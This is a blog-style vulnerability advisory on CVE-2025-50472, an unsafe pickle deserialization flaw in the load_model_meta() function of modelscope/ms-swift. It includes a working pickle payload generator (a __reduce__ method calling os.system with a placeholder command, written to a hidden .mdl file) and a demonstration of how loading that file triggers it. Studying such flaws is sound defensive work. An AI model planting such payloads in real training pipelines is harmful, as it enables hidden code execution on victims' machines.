Overview
CVE-2025-50472 is a critical vulnerability that resides in the modelscope/ms-swift library up to and including version 2.6.1. The vulnerability allows an attacker to execute arbitrary code remotely by exploiting the deserialization of untrusted data in the `load_model_meta()` function. This flaw poses a serious threat to any system running the vulnerable software, potentially leading to system compromise or leakage of sensitive data.
The vulnerability is particularly concerning due to the stealthy nature of its exploitation. The malicious payload is hidden, and the normal training process remains unaffected even after the arbitrary code execution, making it extremely difficult for the user to detect any malicious activities. This blog post offers a detailed analysis of the vulnerability, its potential impact, and the steps necessary to mitigate its risks.
Vulnerability Summary
CVE ID: CVE-2025-50472
Severity: Critical (CVSS 9.8)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: System Compromise, Potential Data Leakage
Affected Products
Product | Affected Versions
modelscope/ms-swift | <= 2.6.1

How the Exploit Works
The vulnerability exploits the `load_model_meta()` function of the `ModelFileSystemCache()` class in the modelscope/ms-swift library. This function uses `pickle.load()` to deserialize data from potentially untrusted sources.
An attacker can craft a malicious serialized `.mdl` payload and trick the victim into loading it during a normal training run. When the file is deserialized, the attacker's code executes on the targeted machine. Because the payload file is hidden and the training process continues normally after the code runs, the victim has little reason to suspect any tampering.
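To illustrate where the flaw lives, here is a minimal sketch of the vulnerable pattern. The class and method names follow the advisory, but the body is a simplified assumption for illustration, not the library's actual implementation:

```python
import os
import pickle


class ModelFileSystemCache:
    # Illustrative stand-in for the cache class named in the advisory;
    # the real implementation differs, but the risky call is the same.

    def __init__(self, cache_root: str):
        self.cache_root = cache_root
        # Hypothetical metadata path; the real file layout may differ.
        self.meta_path = os.path.join(cache_root, '.mdl')

    def load_model_meta(self):
        # Vulnerable pattern: pickle.load() on a file the user does not
        # fully control. Unpickling invokes arbitrary callables through
        # __reduce__, so a tampered .mdl file means code execution.
        if os.path.exists(self.meta_path):
            with open(self.meta_path, 'rb') as f:
                return pickle.load(f)
        return None
```

Any code path that hands attacker-influenced bytes to `pickle.load()` is exploitable in this way; the underlying problem is the format, not any single call site.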
Conceptual Example Code
While actual exploit code is beyond the scope of this blog post due to its malicious nature, a conceptual payload generator might look something like this:
```python
import pickle
import os

# Malicious class: unpickling an instance executes an attacker-chosen command
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('<arbitrary command>',))

# Serialize the malicious object into a hidden .mdl payload
with open('.hidden_mdl_payload.mdl', 'wb') as file:
    pickle.dump(Exploit(), file)
```
In this conceptual example, the `Exploit` class defines a `__reduce__` method that, when unpickled, executes an arbitrary command. The victim then unsuspectingly loads this malicious `.mdl` file during the normal training process, resulting in arbitrary code execution.
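To make the trigger concrete, the following sketch (reusing the hypothetical file name from the example above) shows that merely deserializing the file is enough to run the embedded command; no attribute access or method call on the result is needed:

```python
import pickle

# Deserializing the tampered file is the trigger: pickle reconstructs
# the Exploit object by calling os.system('<arbitrary command>') before
# the caller ever sees the returned value.
with open('.hidden_mdl_payload.mdl', 'rb') as f:
    meta = pickle.load(f)  # the attacker's command executes here
```

This is effectively what happens inside `load_model_meta()` when it encounters the planted `.mdl` file, which is why the exploit requires no further interaction once the payload is in place.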